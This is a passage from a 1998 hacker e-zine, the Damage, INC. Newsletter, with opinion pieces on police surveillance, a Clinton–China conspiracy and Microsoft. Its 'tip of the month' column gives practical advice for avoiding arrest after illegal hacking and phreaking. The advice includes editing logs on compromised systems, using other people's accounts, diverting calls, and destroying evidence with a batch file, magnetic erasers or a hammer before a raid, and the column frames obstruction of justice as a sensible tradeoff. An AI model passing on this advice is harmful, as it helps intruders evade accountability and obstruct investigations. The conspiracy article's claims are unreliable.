2111 lines
115 KiB
Plaintext
2111 lines
115 KiB
Plaintext
|
||
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛÝ ÞÛÛÛÛÛÛ ÛÛÞÛÛÛÛÛÛÝÛÛÛÛÛÝ
|
||
ÍÍÍÞÛÛÛ ÛÛÛÍÞÛÛ ÛÛÛÍÞÛÛ ÛÛÝÞÛÝÞÛÛ ÛÛÛÍÞÛÛ ÍÍÍÍ ÛÛÜÜÜ ÍÍÍÍÍÞÛÝÛÛÝ ÞÛÝÞÛÛÝÍÍÍÍÍÍ
|
||
ÍÍÍÍÛÛÝ ÛÛÛÍÛÛÝÛÛÛÛÍÛÛÝÞÛÛÍÛÛÍÛÛÝÛÛÛÛÍÛÛÝÍßÛÛÝÞÛÝßßßÍÍÍÍÍÍÛÛÞÛÛ ÛÛ ÛÛÝ ÍÍÍÍÍ
|
||
ÞÛÛÛÛÛÛÛÛÞÛÛÛ ÛÛÛÞÛÛ ÛÛÝÞÛÝÞÛÛÛ ÛÛÛÞÛÛÛÛÛÛÛÝÛÛÛÛÛÛÛ ÛÛÝÞÛÝÛÛÝ ÞÛÝÞÛÛÛÛÛÝÛÛÝ
|
||
"The name speaks for itself!" ÞÝ
|
||
|
||
Presents the
|
||
|
||
Damage, INC. Newsletter
|
||
|
||
April 1998 Issue #8
|
||
|
||
"We keep you honest."
|
||
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
C O N T E N T S :
|
||
|
||
|
||
þ INTRODUCTION - An Introduction to the Damage, INC. Newsletter.
|
||
|
||
þ BIG BROTHER BASHING - Old civil rights killed by new technologies.
|
||
¯ Search String: {BIG BROTHER}
|
||
|
||
þ BLACKENED'S TIP OF THE MONTH - Tips on how to avoid being busted.
|
||
¯ Search String: {BLACKENED}
|
||
|
||
þ CONSPIRACIES AND COVERUPS - Red Long Beach: China controls naval base.
|
||
¯ Search String: {COVERUPS}
|
||
|
||
þ CORRUPTION AND GREED - Billy Gates and his Overwhelming Need for Greed.
|
||
¯ Search String: {GREED}
|
||
|
||
þ DRUGS DISCUSSION - The Existence of Drugs in Our Culture.
|
||
¯ Search String: {DRUGS}
|
||
|
||
þ H/P INFORMATION AND NEWS - Looping the Loop in your area code.
|
||
¯ Search String: {H/P}
|
||
|
||
þ INTERVIEWS AND INTERROGATIONS - An Interview of THC Phreak.
|
||
¯ Search String: {INTERVIEWS}
|
||
|
||
þ LETTERS TO THE EDITOR - More feedback about the Damage, INC. Newsletter.
|
||
¯ Search String: {LETTERS}
|
||
|
||
þ OBJECTIVE OPINIONS - The Consequences of Cloning Humans.
|
||
¯ Search String: {OPINIONS}
|
||
|
||
þ REPORTS FROM THE FRONT - Caller ID Specifications.
|
||
¯ Search String: {REPORTS}
|
||
|
||
þ SOURCE AND SCRIPTS - Linux Sniffer source code.
|
||
¯ Search String: {SOURCE}
|
||
|
||
þ THE JOURNALIST'S TOP TEN LIST - Drugs and their effects.
|
||
¯ Search String: {TOP TEN}
|
||
|
||
þ THOUGHTS, POEMS AND CREATIVE WRITING - Weakness and Strength.
|
||
¯ Search String: {WRITING}
|
||
|
||
þ CLOSING COMMENTS - Shatazar's Inaugural Closing Comments.
|
||
¯ Search String: {CLOSING}
|
||
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
|
||
< DISCLAIMER >
|
||
|
||
All articles contained in the Damage, INC. Newsletter are for informational
|
||
purposes only. Damage, INC. is not responsible for how any of the information
|
||
presented is used. It is not intended to be a manual with instructions to be
|
||
followed. We won't be held responsible for any damages caused, illegal acts
|
||
committed etc. by our readers. If/how you use the information given is entirely
|
||
up to you.
|
||
|
||
|
||
< COPYRIGHT NOTICE >
|
||
|
||
All articles and source code contained within this file are (C) Copyright by
|
||
Damage, INC. (unless stated otherwise). No part of this work can be modified,
|
||
reproduced or changed in any way without the expressed written consent of
|
||
Damage, INC. That means, electronically or otherwise, in part or in whole
|
||
this file must not be altered. It cannot be included with any other releases.
|
||
You cannot claim that you wrote it, or alter any articles and source code that
|
||
has been written and Copyrighted by us. Also, do *not* distribute any
|
||
Damage, INC. releases in "packages" with other text files or utilities. They
|
||
must only be distributed alone in their present, original form. You are
|
||
permitted to read and distribute the Damage, INC. Newsletter freely to quality
|
||
h/p boards only.
|
||
|
||
Copyright 1998 by Damage, INC.
|
||
All Rights Reserved.
|
||
_______________________________________________________________________________
|
||
|
||
|
||
INTRODUCTION: Greetings to our loyal readers that continue to seek the honesty
|
||
and truth that is in the Damage, INC. Newsletter. In a world
|
||
that is engulfed in a thick fog of lies, corruption, and
|
||
hypocrisy, honesty is the bright torch that dispels the darkness.
|
||
Unfortunately, the fog that surrounds us can also be within a
|
||
person. When a person believes the lies, ignores corruption, and
|
||
tolerates hypocrisy, his or her mind is lost in darkness. Only
|
||
honesty and the truth can burn through the fog, enlightening that
|
||
person's mind, allowing him or her to expand and grow stronger.
|
||
However, the torch of honesty can only be grasped by a person
|
||
that wants to obtain it.
|
||
|
||
Each individual must choose whether they wish to be a zombie or
|
||
an enlightened human being. For those that choose to learn the
|
||
honest truth and to grow outwards as a person, the Damage, INC.
|
||
Newsletter is intended to be a torch to help you on your journey.
|
||
How you interpret the words within, and whether you agree or
|
||
disagree with our thoughts and opinions is up to you. As long as
|
||
you kindle new found knowledge that was presented to you with
|
||
honest intentions and allow it to burn within you, the truth will
|
||
be within your grasp. If you accept the truth, you can begin to
|
||
dispel the fog that may have been planted in your mind. It
|
||
depends on how hard you will work and fight to learn the truth.
|
||
|
||
|
||
BIG BROTHER BASHING - {BIG BROTHER}
|
||
Old civil rights killed by new technologies.
|
||
|
||
Canadian Charter of Rights and Freedoms; Section 8:
|
||
"Everyone has the right to be secure against unreasonable search or
|
||
seizure."
|
||
|
||
Fourth Amendment to the Constitution of the United States of America:
|
||
"The right of the people to be secure in their persons, houses, papers, and
|
||
effects, against unreasonable searches and seizures, shall not be violated,
|
||
and no Warrants shall issue, but upon probable cause, supported by Oath or
|
||
affirmation, and particularly describing the place to be searched, and the
|
||
persons or things to be seized."
|
||
|
||
Protection against unreasonable search and seizure. Well-meaning passages
|
||
written with the best of intentions. They are designed to prevent citizens, and
|
||
their possessions, from being frisked without reason by powertripping police
|
||
officers. To a much lesser extent, they prevent the government and its
|
||
bureaucracies from invading a citizen's privacy. However, these "protective
|
||
clauses" were written for tactics used in a different era. In days when there
|
||
was no recourse for the police, but to physically frisk someone or search a
|
||
building. New technologies have changed all that. It is now within the Thought
|
||
Police's power to literally see you naked, with the exception of any other
|
||
foreign objects you may have near your body... without you even knowing about
|
||
it.
|
||
|
||
In 1996, Millimetrix Corp. developed what they call a "Passive Millimetre
|
||
Wave Imager" (PMWI). It allows a cop to "read" the electromagnetic waves that
|
||
all human beings broadcast. The electromagnetic waves goes right through
|
||
clothing, but objects like concealed weapons, certain packages, etc., block the
|
||
waves. Two versions of the PMWI were developed by Millimetrix. A larger
|
||
version is designed to be placed inside of a police cruiser. By looking at a
|
||
little monitor installed in his dashboard, the cop can scan a large group of
|
||
people before he gets out of his car to confront them. A battery powered,
|
||
hand-held unit was also developed so a cop can virtually strip the clothes off
|
||
of one person, or a large group of people while on foot.
|
||
|
||
Whom do you believe gave Millimetrix Corp. the funds to develop this
|
||
privacy-intrusive technology? Big Brother of course. The United States'
|
||
National Institute of Justice them granted $2.1 million US in order to "protect
|
||
the United States from terrorist attack." In my opinion, that kind of rhetoric
|
||
is Big Brother using the "protecting society from crime/terrorism" line again.
|
||
|
||
However, unwarranted searching technologies like PMWIs aren't exclusively in the
|
||
hands of anti-terrorist agencies. They have given them to ordinary, uniformed
|
||
officers and installed them in police cruisers. The "boys and girls in blue"
|
||
are assigned to monitor and bust *us*, not to stop terrorist groups from
|
||
destroying the "valuable" properties owned by Big Brother and big business.
|
||
|
||
A tremendous bonus for the police is the fact that the PMWI can operate up to 27
|
||
metres away from the victim of his unwarranted search. The PMWI can also see
|
||
through walls to further invade the privacy of all citizens that are under the
|
||
surveillance of Big Brother. Millimetrix Corp. is quick to point out that the
|
||
PMWI offers "some privacy." After all, it "does not reveal intimate anatomical
|
||
details of the person." It allows a cop to perform a body search without the
|
||
knowledge of the citizen, yet it stops a perverted one from being a virtual
|
||
`peeping Tom.' Now Big Brother and his cohorts are telling us in essence that
|
||
there are "varying degrees of privacy." Huh? How it is possible to have
|
||
varying degrees in privacy? Something is either private, or it is not. Of
|
||
course you are entitled to your own opinion.
|
||
|
||
Big Brother's message to the zombies in "society" therefore equates to "do as I
|
||
say, and you will *not* do as I do." Do you think that the majority of people
|
||
in "society" have bought into this blatant hypocrisy? Oh hell yes! :-( While
|
||
doing research for this article, I found the results of a survey from the Los
|
||
Angeles Times. The respondents were asked if they would "curtail some `civil
|
||
liberties' if it would help thwart terrorism." Fifty-eight percent said yes,
|
||
they would willingly surrender their civil rights to Big Brother. An additional
|
||
13 percent said "it would depend on what rights were at stake." Whether the
|
||
survey was doctored by the Los Angeles Times on behalf of Big Brother, or is
|
||
legitimate, the result will influence many people to go with the grain and agree
|
||
with the majority.
|
||
|
||
Let's burn through the rhetoric and lies that Big Brother spreads in an attempt
|
||
to brainwash all citizens. In truth, the Constitution, the Bill of Rights and
|
||
the watered down Canadian equivalent, the Charter of Rights and Freedoms, and
|
||
the court's fleeting adherence to them is Big Brother's largest road block. Big
|
||
Brother wants to limit our actions and thoughts in order to control us. By
|
||
buying into the overblown fears of terrorism, Big Brother's supporters within
|
||
"society" have allowed Big Brother to slice away at our constitutional rights
|
||
until they are virtually meaningless. I feel the "majority of people" should
|
||
not be so paranoid about terrorist attack. Big Brother is more of a threat to
|
||
their quality of life than any terrorist could possibly be. Unless the wish of
|
||
the "majority" is to live in the oppressive totalitarian state that Big Brother
|
||
is creating. :-(
|
||
|
||
Written by Shatazar ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
BLACKENED'S TIP OF THE MONTH - {BLACKENED}
|
||
Tips on how to avoid being busted:
|
||
|
||
These are only basic tips on how to avoid being busted. Some of them are
|
||
based upon my personal experience, some of them are used by others, and the
|
||
remainder are just ideas. You must use your own common sense and judgement.
|
||
I am by no means promoting, advocating or condoning hacking/phreaking. In
|
||
fact, the following tips can be applied to other activities that are totally
|
||
legal if you just want to protect your privacy. They're for informational
|
||
purposes only. If you want to hack or phreak and apply them to that, then
|
||
it's your choice and you are free to do so. However, Damage, INC. isn't
|
||
responsible if you use these techniques, do something illegal and get busted.
|
||
|
||
I would advise that you always be cautious, h/p safely and take any measures
|
||
necessary to ensure that you aren't being traced though... if you are going
|
||
to get involved in hacking and phreaking. Always remember that "ignorance of
|
||
the law" and "being a newbie" aren't acceptable excuses to law enforcement.
|
||
They will bust you, regardless of what excuses you make, your level of
|
||
experience or the amount of years that you've been involved in h/p. In fact,
|
||
many of the people that are getting busted are newbies. Most of the others
|
||
think that they're invulnerable, due to their ego and pure arrogance. Don't
|
||
allow that to happen to you. Don't get sloppy, make stupid mistakes, and be
|
||
easily traceable. Read every article that you can relating to being busted
|
||
and how to avoid it. You can learn and benefit tremendously from reading
|
||
about someone else's bust experience, and thus avoid foolishly repeating the
|
||
exact same mistakes as they once did. If you are arrogant and think that you
|
||
don't need to know about protection against being busted, then you're on your
|
||
own and can say "I wish I knew then what I know now." or "I wish I hadn't done
|
||
that." from behind bars. Either way, you'll only have yourself to blame.
|
||
|
||
|
||
Section 1: Trust.
|
||
|
||
Trust is such a small word, is often overlooked and yet in reality it's the
|
||
basis of everything. Trust is also the most important thing of all. If
|
||
possible, trust no one. Meaning, don't tell people about your h/p activities
|
||
and trust them with that information. Don't brag to other hackers/phreaks
|
||
(or anyone else for that matter) either. In fact, you shouldn't even tell your
|
||
personal friends certain things (especially not over the phone). ;) If you
|
||
do that, then you risk getting busted. It's not necessary, so why put yourself
|
||
at risk? Plus, they could rat you out if they happen to get busted... in
|
||
exchange for a lighter sentence (making a deal, plea bargaining). If you can't
|
||
abide by that rule/tip, then be *very* careful about who you trust and what
|
||
information you trust them with. I realize that it's difficult not to trust
|
||
anyone, but it's the safest method with certain sensitive (illegal) information.
|
||
There are certain documents etc. that you shouldn't distribute to others under
|
||
any circumstances.
|
||
|
||
If you have known someone for the majority of your life, then you should at
|
||
least consider limiting your trust of them. Trust should never be given out
|
||
quickly and easily. Don't just trust them with everything. Otherwise, it
|
||
could come back to haunt you. You cannot predict whether or not someone that
|
||
you 'trust' will betray you in the future. Obviously, each person's situation
|
||
is different. Always try to use good judgement. Think of the possibilities,
|
||
consequences etc. before you entrust someone with specific information that
|
||
could lead to you being busted. Don't give out access freely to anything that
|
||
could be used against you as evidence. That includes your system, files, codes,
|
||
detailed stories describing what you've done and anything else that you think
|
||
*might* turn out to be harmful to you. Basically, be careful with what you type and
|
||
and say in voice conversations. Sometimes your friends can be enemies willing
|
||
to testify against you. Never forget that.
|
||
|
||
|
||
Section 2: Encryption.
|
||
|
||
Is encryption safe? Is it reliable and fool proof? Can they bust me, decrypt
|
||
all of my data and use it in court as evidence against me? If encryption won't
|
||
protect me then should I bother to encrypt files? In this section, I'll attempt
|
||
to answer these important questions. However, if you want more information then
|
||
I suggest that you read and learn more about cryptography.
|
||
|
||
Some methods of encryption aren't "safe" to use, thus they should be avoided.
|
||
*Any* encryption that conforms to standards set by the government is unsafe.
|
||
If you suspect that you're using an encryption program that abides by the
|
||
government standards, quit using it immediately. Then find out which ones don't
|
||
and switch to that one. Make absolutely sure that you know it doesn't conform
|
||
before you start relying on it. In other words, do some research first.
|
||
|
||
However, regardless of what type of encryption you use, your data still isn't
|
||
completely safe and secure anyway. Why not? The reason is that it relies on a
|
||
password. That is the weakest link in encryption, and that's what will be
|
||
first attacked by law enforcement and then exploited. So, even if you've
|
||
encrypted your entire hard drive, backups etc. they can still use brute force
|
||
to decrypt it and access everything. Meaning, they'll simply use password
|
||
cracking utilities to do the job for them. Also, keep in mind that they'll
|
||
confiscate your computer system and anything computer related near it... which
|
||
gives them an unlimited amount of time to work on it. That's what search and
|
||
seizure means. Just because you don't keep information (codes etc.) in
|
||
plaintext files or written down on paper etc. doesn't mean that you're safe.
|
||
Just as, if you think a long password (as an example, one more than the typical
|
||
8 characters password that many people use) is going to protect you, then
|
||
you're wrong. It won't stop them. No encryption offers total protection and
|
||
security... not even 128 bit. Even so, you should encrypt lists of codes and
|
||
anything else that you feel could be used against you. It won't keep all prying
|
||
eyes from reading and/or accessing it but at least it offers minimal security.
|
||
You can also use encryption in combination with programs/devices that will
|
||
destroy the encrypted data in a bust situation. More information on that will
|
||
be mentioned in the following sections.
|
||
|
||
|
||
Section 3: Precautions and Prevention.
|
||
|
||
Obviously, you want to prevent yourself from ever getting busted. If you hack
|
||
or phreak, you don't want to be detected and traced. How does one avoid
|
||
detection? What precautions should be taken? What methods are "safe"? What
|
||
does stealth mean? Are these measures really necessary to protect myself and
|
||
my privacy? In this section, I'll answer those important questions and also
|
||
give you some other sources of reliable information to consult.
|
||
|
||
First, the importance of prevention cannot be overstated. If you actively work
|
||
and think of ways to prevent yourself from being detected, then your chances of
|
||
actually being busted will be decreased significantly. Your motivation to do
|
||
this should be the fact that if you're actively involved in h/p and you take
|
||
no steps to avoid detection, then eventually you'll end up serving time due to
|
||
your own arrogance and ignorance. Don't let your ego cloud your judgement.
|
||
Never assume that it'll never happen to you. Logic dictates that anyone that
|
||
hacks/phreaks can be busted, regardless of what level you're at, how much you
|
||
think you know, how popular and well known you are in the h/p scene. So, we
|
||
encourage you to take these steps to avoid being detected and busted. That's
|
||
not an easy task though, so don't become overly confident. Constantly being
|
||
stealthful requires a lot of effort and thought if you're going to be successful
|
||
at remaining undetected and anonymous while hacking/phreaking. Here are a few
|
||
tips to consider following:
|
||
|
||
|
||
-/- Don't have phone lines etc. installed in your real name. Make sure your
|
||
number is unlisted as well.
|
||
|
||
-/- Don't give your real name, address, phone number etc. for any accounts on
|
||
networks. That includes ISPs, if you pay for accounts. I'd advise that you
|
||
borrow other people's instead though.
|
||
|
||
-/- Don't dial anything directly that you're hacking. Always divert and dial
|
||
through multiple things like networks etc. to prevent being easily traced.
|
||
|
||
-/- Always examine and edit all logs on the systems that you hack. Make sure
|
||
that copies of the logs aren't sent elswhere on the system. Look for
|
||
email daemons on admin accounts etc. Not all systems are the same and
|
||
use default paths, so be careful.
|
||
|
||
-/- Avoid attending all of the hacker conventions (like Defcon etc.), and be
|
||
aware of the fact that they're monitored. Don't become too "well known".
|
||
Popularity is good for your ego, but obviously makes it easy to identify
|
||
you.
|
||
|
||
-/- Don't get caught up in socializing with other hackers/phreaks and give them
|
||
personal information about yourself. Never assume that they're not being
|
||
investigated or won't rat you out. Many hackers are caught because someone
|
||
else they know got busted and cooperated with the law enforcement
|
||
authorities. So, be careful not to give out your phone number, real name,
|
||
address, information about what you're hacking etc. to people. Hackers
|
||
often setup or turn in other hackers. Many have worked with law enforcement
|
||
after they've been busted...and help catch whoever they're told to. So,
|
||
be stealthful whenever possible.
|
||
|
||
-/- Don't transit personal data to other systems. That includes ones that
|
||
you've hacked. Never store documents or "trophies" taken from other systems
|
||
that you've hacked on an insecure system. They can trace it back to you if
|
||
you do that. They can find out where you've called, check those systems,
|
||
find the files and that's proof enough of where you got them from.
|
||
|
||
-/- Use different handles/aliases/login IDs on systems when you setup accounts.
|
||
That way, it won't be so obvious and easy for them to link together.
|
||
|
||
-/- Keep your hacking activities seperate from everything else. If you use
|
||
computers at a University, or a network, for normal use, don't use the same
|
||
systems for hacking purposes. Check around for and be aware of cameras
|
||
whenever you're using a system in a lab. Also, if you do go to remote
|
||
locations to hack/phreak, don't follow any regular schedule. Be observant
|
||
and watch for anything or anyone that seems out of place. If something
|
||
isn't right, leave. Sometimes law enforcement will figure out that you
|
||
use systems or phones at certain places, and wait there for you to arrive.
|
||
|
||
-/- Don't become predictable. Falling into the trap of doing the same things
|
||
from the same places and getting too "comfortable" with your surroundings
|
||
can end up being your downfall. Never assume that you're safe. If at all
|
||
possible, move to different areas. If you live in the same place for too
|
||
long, then it's simple for them to track you down. Plus, with the same
|
||
phone number, they can log all of your outgoing calls etc. easily.
|
||
|
||
-/- Be careful with which PBXs, extenders, loops, other codes you use. Learn
|
||
about ANI. Also, if you're using an extender or loop to divert, be sure
|
||
to check it several times by dialing an ANI to be certain that it can be
|
||
used as a working diverter. Dialing through multiple extenders that divert
|
||
may not be enough. In fact, it may even harm you.
|
||
|
||
-/- Be careful when using any outdials etc. and know what you're doing.
|
||
|
||
-/- Don't get into carding, malicious hacking etc. It'll only lead to you
|
||
getting busted. If you're already involved in that, quit now.
|
||
|
||
-/- Never destroy or edit any data on systems you've hacked into unnecessarily.
|
||
That means, only edit logs etc. to cover your tracks and leave the rest
|
||
as is.
|
||
|
||
-/- Don't use IRC to chat with your friends in channels like #519, #warez etc.
|
||
If you associate with lamers like that, then you'll eventually get caught.
|
||
Avoid using the same alias while on the net. Again, be stealthful (or
|
||
completely anonymous) if at all possible. If you can access the net
|
||
anonymously, spoof your IP, etc. that still may not be enough if they
|
||
they really want to get you. Plus, IRC is logged and monitored.
|
||
|
||
-/- Data/Voice numbers that you dial using your modem/phone can be used to
|
||
track you down... regardless if you move. If you dial the same numbers
|
||
(a friend, a certain system, a certain BBS, whatever) frequently, that
|
||
data is recorded. Therefore, even if you've moved several times to
|
||
different cities/states/provinces, the telco can still trace you because
|
||
of that. They can just cross reference it with all of the incoming calls
|
||
to that particular number. They can also question the person that owns
|
||
that line.
|
||
|
||
-/- Learn how to check your line for taps. Take any measures that you can to
|
||
make sure that it's secure physically. By that, I mean look at it and
|
||
see if it's been tampered with etc. and learn more about meausures that
|
||
you can take to protect it.
|
||
|
||
-/- Be observant. If you think that you're under surveilance, then take the
|
||
steps discussed below about destroying data.
|
||
|
||
There are quite a few other things that you can do to avoid being detected and
|
||
busted. Agent Steal had a few interesting ideas in his Phrack article that are
|
||
hardware based. One was what he referred to as a Stealth Box. It actually
|
||
isn't that complex and doesn't require a lot of electronics knowledge. You
|
||
need two modems etc though. ;) There are many other things that could've been
|
||
included in this article, but it's already quite lengthy.
|
||
|
||
|
||
Section 4: Destruction of evidence.
|
||
|
||
I'm not advocating or encouraging obstruction of justice. However, if you are
|
||
about to be busted and feel the need to destroy any so-called "evidence" that
|
||
may exist on your system, here are a few ideas.
|
||
|
||
First, hopefully your sensitive data is already encrypted. It's not a good idea
|
||
to store codes, documents etc. in plaintext format. Second, you'll need to
|
||
have a copy of the NUKE utility by Damage, INC. in your path. Third, you should
|
||
create a BUST.BAT file that includes commands such as "NUKE C:\STUFF\*.*" for
|
||
the areas that the files you want to nuke are stored in. The batch file just
|
||
makes the entire procedure much quicker, which can be crucial in critical bust
|
||
situations. If said files are encrypted (with non-standardized, non-conforming
|
||
encryption), then nuked by NUKE... most likely the feds won't be able to use any
|
||
of it against you. However, they can charge you for obstruction of justice but
|
||
that's minor in comparison. Of course, it all depends on what they *could've*
|
||
burned you with. So, it's a tradeoff in a sense. Another good idea is to have
|
||
a bulk magnetic eraser mounted next to your hard drive. Put a switch close to
|
||
your computer, so that it's easily accessible. Or, even better than that,
|
||
install several switches for it in different locations and you can activate the
|
||
device from more than one room. Agent Steal's article in Phrack mentions doing
|
||
the same thing, among others. I've personally seen/used bulk erasers before
|
||
and know how quickly they'll erase data when the hard drive is powered up and
|
||
spinning. ;) The last resort is to use a steel hammer to physically smash the
|
||
hard drives. Even if you're desperate and time is running out (ie, the feds are
|
||
breaking down your front door), you should still have the necessary seconds to
|
||
execute those saving actions. I recommend that you have everything setup and
|
||
ready to use in case of a bust. Afterall, if you're not prepared then it's too
|
||
late to do anything when you're taken by surprise. That's why people get busted
|
||
and their systems are confiscated with everything still intact. Basically, you
|
||
have two options at that point: Let them take your system, get a lawyer, and
|
||
try to fight them in court... Or, do everything in your power to destroy the
|
||
evidence, obstruct the investigation any way that you can and face the lesser
|
||
charge of obstruction of justice.
|
||
|
||
In closing, I recommend that you read Agent Steal's article in Phrack issue #52
|
||
on getting busted. Minor Threat also contributed to it. Their first hand
|
||
accounts and experiences with the court/prison system are a must read. It's
|
||
accurate and contains some excellent information. Obviously, Damage, INC. hopes
|
||
that you've learned something from reading this article and wishes that you none
|
||
of you get busted. However, some of you will. If you are busted, don't rat out
|
||
your friends. Only scum...the lowest of the low would do that to save their own
|
||
ass. My final words of advice to you are: be wise, be stealthful and extremely
|
||
cautious. ;)
|
||
|
||
Written by BLACKENED ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
CONSPIRACIES AND COVERUPS - {COVERUPS}
|
||
Red Long Beach: China controls naval base.
|
||
|
||
As many people know Communist China is a place where free thoughts land Chinese
|
||
men and women in prison (slave) camps, and expressing them earns the person a
|
||
bullet (paid for by the surviving family) in the back of the head. China
|
||
is the enemy of the United States of America and its allies. In fact, they
|
||
are conspiring with Russia to create their own world order. However, that is
|
||
the subject of another article.
|
||
|
||
Despite the fact that the Chinese communists hate our way of life, and openly
|
||
instigate conflicts, like the "war games" scenario off the shores of Taiwan,
|
||
"democratic" countries continue to cut economic trade deals with them. It is
|
||
sickening how hypocritical the United States and Canada are when both bring up
|
||
human rights whenever they sign the latest multi-million or billion dollar deal
|
||
with Red China. By supporting them economically, countries that trade with
|
||
China are also supporting the oppression the communists impose on the Chinese
|
||
people. There have been some extremely disturbing "side deals" that have come
|
||
to light. One deal centers around a closed U.S. Naval Base in Long Beach,
|
||
California. With the support of president Bill Clinton, the Long Beach Naval
|
||
Base has been refitted and leased to the China Ocean Shipping Company (COSCO).
|
||
|
||
This conspiracy started in 1991 when George Bush decided that the Long Beach
|
||
Naval Station should be shut down in order to save money. In 1993, Bill Clinton
|
||
finished what Bush started by making sure that the naval base was permanently
|
||
closed. That decision lead to a loss of over 17,500 military and civilian jobs,
|
||
and crippled Long Beach's economy. There was little interest in the abandoned
|
||
base until the end of 1995. The Chinese got involved during a period of time
|
||
when the Clinton-Gore campaign was heavily involved in fund raising. Clinton
|
||
and his administration secretly attempted to setup a sweet lease deal that would
|
||
"entice" COSCO to take up residence in the old Long Beach Naval Station. The
|
||
Secretary of the Navy turned over control of the closed naval base to the City
|
||
of Long Beach, which had an estimated value of $65 million, free of charge.
|
||
Taxpayers in Long Beach paid approximately $200 million to convert the naval
|
||
base into a cargo port. The city then turned around and leased the naval base
|
||
to a foreign shipping company that is owned and operated by Communist China.
|
||
The communists have signed a 10 year lease at the cost of $14.5 million per
|
||
year. The lease also gives the communists the option of forcing the City of
|
||
Long Beach, at their expense, to develop an additional 150 acres of the old
|
||
shipyards.
|
||
|
||
I believe that China told Clinton what they wanted, in this case the Long Beach
|
||
Naval Station, and Clinton accommodated them without any delay or red tape. I
|
||
have some facts that prove that the Clinton administration has links to the
|
||
Chinese. Many powerful Democrats tried to coverup the fact that they took
|
||
campaign donations from prominent Chinese that operate within the United States.
|
||
When the Chinese contributions were revealed, the Democrats desperately attempt
|
||
to seek forgiveness from the American people. House minority leader Richard
|
||
Gephardt, Senate minority leader Tom Daschle, and others claim to have refunded
|
||
these communist payoffs. Also, if Clinton and his administration were not under
|
||
the influence of the Chinese, then why would they choose not to investigate
|
||
COSCO with the National Security Council, the Navy, or the CIA? That is exactly
|
||
what happened. To quote a White House spokesman named Lanny Davis "there seemed
|
||
to be no reason to check with the National Security Council on the decision."
|
||
Clinton didn't want his sweet Chinese deal compromised by the NSC or the CIA.
|
||
Meanwhile, COSCO was caught smuggling Russian AK-47s into Oakland, California.
|
||
A COSCO liner rammed into a busy New Orleans boardwalk. Luckily there were no
|
||
fatalities, but 116 people were injured. COSCO also admitted to dumping 640
|
||
tons of raw waste into the ocean instead of taking it to China. In 1993, the
|
||
U.S. Navy spied on a COSCO ship that they believed to contained chemical weapons
|
||
components when it entered the Persian Gulf. In 1992, COSCO was fined $400,000
|
||
for attempting to bribe U.S. officials in order to avoid paying tariffs on the
|
||
goods that they wanted to import into the United States. Also, the United
|
||
States Coast Guard has placed COSCO on its list of "ships to monitor and search"
|
||
because of various infractions against many international safety regulations.
|
||
|
||
It is revolting how Clinton has endangered the security of the United States of
|
||
America. Even though the NSC and CIA are untrustworthy, and are guilty of their
|
||
own conspiracies and coverups, the fact that Clinton avoided consulting them can
|
||
only mean that the communists have offered or given Clinton something that he
|
||
desperately wants. Clinton must have some kind of self-serving reason why he
|
||
would sell the United States, piece by piece, out to its enemies like Red China.
|
||
Another disturbing fact is that a simple mayor and his local civil employees
|
||
were allowed to negotiate this lease without any thought to the security of the
|
||
United States. Setting aside the corrupt business practices of the China Ocean
|
||
Shipping Company, the fact that they are operated by communists should have
|
||
immediately disqualified them from operating a cargo port in Long Beach. There
|
||
is no doubt in my mind that the Chinese will use the Long Beach Naval Station as
|
||
a central base for their own intelligence agents.
|
||
|
||
That is the reason why two Republican congressmen actually attempted to stop the
|
||
Chinese from taking over the Long Beach Naval Station. The congressmen were
|
||
concerned that COSCO would be able to smuggle goods into the United States much
|
||
easier, as well as a base for Chinese intelligence. However, after a long
|
||
battle, it was determined that the lease would be killed if Clinton did not use
|
||
his "waiver authority" to save it. Hmmm... in the end the communist-supporting
|
||
president, who tried to coverup the fact that he pushed for the lease of Long
|
||
Beach Naval Station to the Communist China shipper had the final decision on the
|
||
matter.
|
||
|
||
Unfortunately, I believe that the Red Long Beach conspiracy is only a small one
|
||
within a much larger conspiracy. Bill Clinton's actions show him to be a
|
||
tremendous backer of Communist China, even at the expense of the security and
|
||
economy of the United States. Why would Clinton push the loss of hundreds of
|
||
millions of dollars so it is easier for the Chinese to spy upon the U.S.,
|
||
as well as smuggling illegal goods, or even weapons of mass destruction? That
|
||
is a question that all Americans should be asking of their president and his
|
||
administration. Unfortunately, in order for the truth to be revealed, Americans
|
||
will have to stop being sidetracked by trivial "issues."
|
||
|
||
Written by Shatazar ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
CORRUPTION AND GREED - {GREED}
|
||
Billy Gates and his Overwhelming Need for Greed.
|
||
|
||
Micro$oft is a huge, corrupt, greedy corporation. They've demonstrated
|
||
repeatedly that they have no regard for other software companies and their
|
||
goal is to buy out the competition. Obviously, they aren't satisfied with
|
||
their current stranglehold on the industry. They want nothing less than a
|
||
total monopoly.
|
||
|
||
This article isn't about statistics. I'm not going to quote figures of their
|
||
quarterly or yearly profits, sales etc. If you want to know that information,
|
||
then I'm sure you can find it by checking out a few web sites on your own.
|
||
Basically, I want to expose Gates and his company Micro$oft, to show just how
|
||
greedy and corrupt they really are.
|
||
|
||
Gates' estimated net worth is over $40 Billion U.S. dollars, and Micro$oft is
|
||
estimated to be worth $400+ billion dollars. Both amounts are increasing so
|
||
rapidly that it's not possible to include statistics that are more accurate
|
||
than that. In fact, it's been reported that Billy Gates has made over $100
|
||
million dollars in a single day on occasion. I wonder if he considers that
|
||
to be a good day, or a bad day? At any rate, that should be an indication of
|
||
his wealth. To put it bluntly, he's stinking fucking rich. He's not just your
|
||
average, run of the mill, fat cat. Gates is literally the fattest cat of them
|
||
all... and he's only getting fatter as each day passes.
|
||
|
||
How much money is enough for one man? How much power and control over an
|
||
entire industry is enough? Why do people support, defend and have sympathy
|
||
